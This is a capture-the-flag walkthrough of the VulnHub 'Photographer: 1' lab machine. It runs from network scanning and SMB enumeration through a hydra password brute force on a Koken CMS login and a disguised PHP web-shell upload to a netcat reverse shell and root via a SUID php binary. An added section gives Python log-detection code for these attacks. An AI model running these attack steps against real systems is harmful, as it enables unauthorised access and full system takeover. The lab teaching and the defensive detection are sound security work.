VulnHub: Photographer: 1

ratiros01
6 min read · May 12, 2021

Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.47.

2. Port scan

nmap -Pn 10.0.2.47
nmap -Pn -p1000- 10.0.2.47

3. OS and service scan

nmap -A -p80,139,445,8000 10.0.2.47

Here are the discovered services:

  • 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  • 139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
  • 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
  • 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Service Enumeration


1. HTTP on port 80

nikto scan

nikto -h http://10.0.2.47

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q

Access the site

View the page source. A possible username is revealed.

2. SMB on port 139 and 445

Scan the service

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47

I got an accessible directory.

Access “sambashare” and download files

smbclient //10.0.2.47/sambashare
dir
get mailsent.txt
get wordpress.bkp.zip
exit

Read the file

cat mailsent.txt

I got usernames and emails.

Create user.txt

Create mail.txt

Read wordpress.bkp.zip

unzip wordpress.bkp.zip
ls -la
cd wordpress
ls -la
cat wp-config-sample.php

There’s a credential, but I doubt that I can use it. It’s Portuguese.

3. HTTP on port 8000

I tried a directory scan using gobuster, but I couldn't scan it.

Use dirbuster instead

There’s /admin directory.

Access the site. This site is built w/ Koken.

View the page source; not much is revealed.

Searching for a Koken CMS exploit, I came across this. However, I need credentials to exploit it.

Access /admin. It’s a login page. It also needs an email, which I already saved as mail.txt.

Test input

I got an error message. I will use this to crack the password w/ hydra.

Intercept the request w/ Burp Suite.

Crack the password w/ hydra

hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -u

I got the credential.

Access the site.

Exploitation

1. Follow the exploit guide. Create a shell file and save it as “image.php.jpg”

2. Import the file

3. Intercept w/ Burp and edit the request

Intercept w/ Burp

Edit the request and forward

Verify upload process

Copy the link

Paste it into the browser and test the shell by supplying the “id” command

4. Reverse shell

Prepare a listener on port 443

rlwrap nc -lvp 443

Intercept the shell request and send it to the Repeater.

I will use a command from this cheat sheet.

URL-encode the command w/ Burp Suite’s Decoder.

Paste it into the cmd parameter and send the request.

Back at the listener, now I’ve got the shell.
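As an added defender-side example (not part of the original post), here is a small Python detector run over constructed Apache access-log lines that would flag the two things done above: the hydra burst of POSTs to /api.php?/sessions and a PHP file being served out of Koken's upload storage tree. The /storage/originals/... path layout, the sample log lines, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache access-log lines (sample data, not from the original post)
# that mimic the traffic the hydra run and the image.php upload would leave.
SAMPLE_LOG = """\
10.0.2.15 - - [12/May/2021:10:00:01 +0000] "POST /api.php?/sessions HTTP/1.1" 200 512
10.0.2.15 - - [12/May/2021:10:00:01 +0000] "POST /api.php?/sessions HTTP/1.1" 200 512
10.0.2.15 - - [12/May/2021:10:00:02 +0000] "POST /api.php?/sessions HTTP/1.1" 200 512
10.0.2.15 - - [12/May/2021:10:00:02 +0000] "POST /api.php?/sessions HTTP/1.1" 200 512
10.0.2.15 - - [12/May/2021:10:00:03 +0000] "POST /api.php?/sessions HTTP/1.1" 200 1410
10.0.2.15 - - [12/May/2021:10:05:31 +0000] "GET /storage/originals/0a/1b/image.php?cmd=id HTTP/1.1" 200 300
10.0.2.99 - - [12/May/2021:10:06:00 +0000] "POST /api.php?/sessions HTTP/1.1" 200 1410
10.0.2.99 - - [12/May/2021:10:06:05 +0000] "GET /storage/originals/0a/1b/photo.jpg HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/api.php?/sessions"  # Koken login endpoint used by the hydra command above
# A .php file served from the upload tree, or a double extension like image.php.jpg,
# should not appear in legitimate traffic (storage layout is an assumption).
UPLOAD_EXEC_RE = re.compile(r'^/storage/.*\.php(\.|\?|$)', re.IGNORECASE)

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) tuples; skip unparsable lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, path, status = m.groups()
            yield ip, datetime.strptime(ts, TIME_FMT), method, path, int(status)

def login_bursts(log_text, threshold=5, window_s=60):
    """Return IPs that POST to the login endpoint >= threshold times within window_s."""
    hits = defaultdict(list)
    for ip, ts, method, path, _ in parse(log_text):
        if method == "POST" and path == LOGIN_PATH:
            hits[ip].append(ts)
    flagged = set()
    for ip, times in hits.items():
        times.sort()
        for i in range(len(times) - threshold + 1):  # sliding window over sorted times
            if times[i + threshold - 1] - times[i] <= timedelta(seconds=window_s):
                flagged.add(ip)
                break
    return sorted(flagged)

def executable_uploads(log_text):
    """Return (ip, path) pairs where a PHP file was fetched from the upload storage tree."""
    return [(ip, path) for ip, _, _, path, _ in parse(log_text) if UPLOAD_EXEC_RE.match(path)]
```

Run against a real access log, the same two checks catch a brute-force attempt before it succeeds and a renamed upload the moment it is first requested.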

Privilege Escalation

1. Get a TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore the directories. I came across interesting files, as listed:

cat /var/www/htmk/koken/storage/configuration/database.php
cat /home/daisa/user.txt

3. Verify SUID

find / -perm -u=s -type f 2>/dev/null

I noticed php7.2.

Search in GTFOBins

Follow the guide

CMD="/bin/sh"
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami

Now I’m root.
